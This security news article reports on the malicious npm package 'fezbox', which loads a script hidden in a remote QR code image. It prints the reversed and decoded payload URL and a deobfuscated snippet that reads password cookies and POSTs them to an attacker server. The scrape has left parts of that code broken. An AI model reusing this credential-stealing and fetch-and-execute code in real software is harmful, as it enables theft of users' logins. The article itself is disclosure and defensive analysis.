New npm Malware Steals Browser Passwords via Steganographic QR Code

A novel npm package named fezbox has been uncovered by the Socket Threat Research Team as a sophisticated malware delivery mechanism that exfiltrates username and password credentials from browser cookies via an embedded QR code.

Published under the npm alias janedu (registration email janedu0216@gmail[.]com), the package masquerades as a harmless JavaScript/TypeScript utility library while quietly fetching and executing obfuscated code within a steganographic QR code image hosted on Cloudinary.

At the time of writing, fezbox remains live on npm. Socket has petitioned the npm security team to remove the package and suspend the threat actor’s account.

The Package

fezbox reports to be “a JavaScript/TypeScript utility library of common helper functions, organized by feature modules so you can import only what you need,” once translated from simplified Chinese.

Its README highlights features such as TypeScript types, integrated tests, high performance, and a “QR Code Module” for generating and parsing QR codes.

However, nowhere does it warn that simply importing the library triggers a background process that retrieves and runs code hidden within a remote QR code image.

Socket AI Scanner immediately flags fezbox as known malware, and its analysis reveals multiple layers of obfuscation designed to slip past static analysis tools and human reviewers.

Upon inspection, the minified CommonJS distribution file exposes a series of utility exports—everything from AES decryption to cookie and localStorage helpers—alongside a self-invoking function that delays execution of a malicious payload by two minutes.

The code first ensures it is running in a production environment (not a development or virtual sandbox) by checking a development flag and using a 2/3 probability guard.

After waiting 120 seconds, it instantiates a QRCodeScriptLoader and fetches a QR code image whose URL string is stored reversed to evade detection:

javascript"gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yraniduolc.ser//:sptth"
.split("").reverse().join("")

When flipped, this resolves to:

texthttps://res.cloudinary.com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg

The loader parses the QR code from the image and executes the embedded JavaScript payload.

The Obfuscation

The threat actor applies three distinct obfuscation layers to conceal the credential-stealing behavior:

1. Reversed Strings: Key strings—including the Cloudinary URL and the cookie name “password” reversed as "drowssap"—are stored backward to thwart simple static scans.
2. Steganographic QR Code: The actual malicious script is hidden inside a standard-looking QR code image delivered from a trusted CDN.
3. Minified and Encoded Payload: The QR code’s payload further encodes cookie access functions and network requests using Unicode escape sequences and inline string concatenations.

Once deobfuscated, the payload reads:

javascriptfunction getC(name) 
  return document.cookie
    .split("; ")
    .find(row => row.startsWith(`$name=`))
    ?.split("=")[1];


async function s()  !password) return;
  await fetch("https://my-nest-app-production.up.railway.app/users", 
    method: "POST",
    headers:  "Content-Type": "application/json" ,
    body: JSON.stringify( username, password )
  );

s();

This script harvests the username and password cookies if they exist and sends them via HTTPS POST to the actor’s server, then quietly exits.

Outlook and Recommendations

Modern web applications rarely store plaintext passwords in cookies, limiting the real-world impact of this specific attack.

Nevertheless, the creative use of a steganographic QR code underscores how threat actors will continually innovate to bypass security tools and evade detection.

Traditional static analysis might miss reversed strings or ignore QR code modules entirely, highlighting the need for dynamic and behavior-based dependency scanning.

Developers and security teams should enforce the following best practices:

• Automated Dependency Scanning: Integrate tools like the Socket GitHub App or CLI into CI/CD pipelines to catch suspicious packages before they enter production.
• Browser Extension Alerts: Install browser-based scanners that flag known malware and typosquatting signals at install time.
• Zero-Trust Assumptions: Treat all third-party dependencies as untrusted until verified, especially those with seldom-used modules like QR code parsers.
• Runtime Monitoring: Deploy endpoint protection that can detect unusual network requests or delayed execution patterns in client-side code.

By adopting a layered security approach that combines static checks, dynamic analysis, and runtime monitoring, organizations can stay ahead of increasingly sophisticated supply-chain attacks and protect user credentials from stealthy, obfuscated threats.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.